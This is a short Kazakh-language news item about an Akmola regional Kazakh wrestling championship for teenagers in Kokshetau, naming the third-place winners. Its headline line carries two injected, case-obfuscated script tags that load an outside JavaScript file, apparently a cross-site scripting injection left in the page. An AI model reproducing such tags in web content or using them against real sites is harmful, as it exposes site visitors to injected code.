Қазақ күресінен Ақмола облысының​ чемпионаты​​ өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.03.2020

Елбасы өз Жолдауында ​ ел жастарына көп үміт артатындығын білдірді.​ Бүгінгі жас – болашақ Қазақстанның жанды бейнесі, ертеңгі ел тізгінін ұстайтын тұлға.​ Тәуелсіз мемлекетіміз жастарға үлкен сенім артып, әрдайым қолдау білдіріп келеді.​ Осыған орай үстіміздегі жылдың 24-26 ақпан аралығында Көкшетау қаласында салауатты өмір салтын және спортты насихаттау мақсатында​ 2003-2004 жылдары туылған​​ жасөспірімдер арасында​ Қазақ күресінен Ақмола облысының​ чемпионаты​​ өтті. ​ Чемпионат қорытындысы бойынша Абай атындағы №2 орта мектебінің оқушысы Қайролла Шыңғыс, Казгородок орта мектебінің 9 сынып оқушысы Хожин Сағдат және Невский орта мектебінің 9 сынып оқушысы Тимур Гиниятуллин 3 орынға иеленді.​ Жас спортшылар аудан намысын сәуір айында Шымкент ​ қаласында өтетін республикалық сайыста қорғайтын болады. Құттықтаймыз!

Просмотров: 603


Пікір қосу



Деректерді қолтаңбаға қосу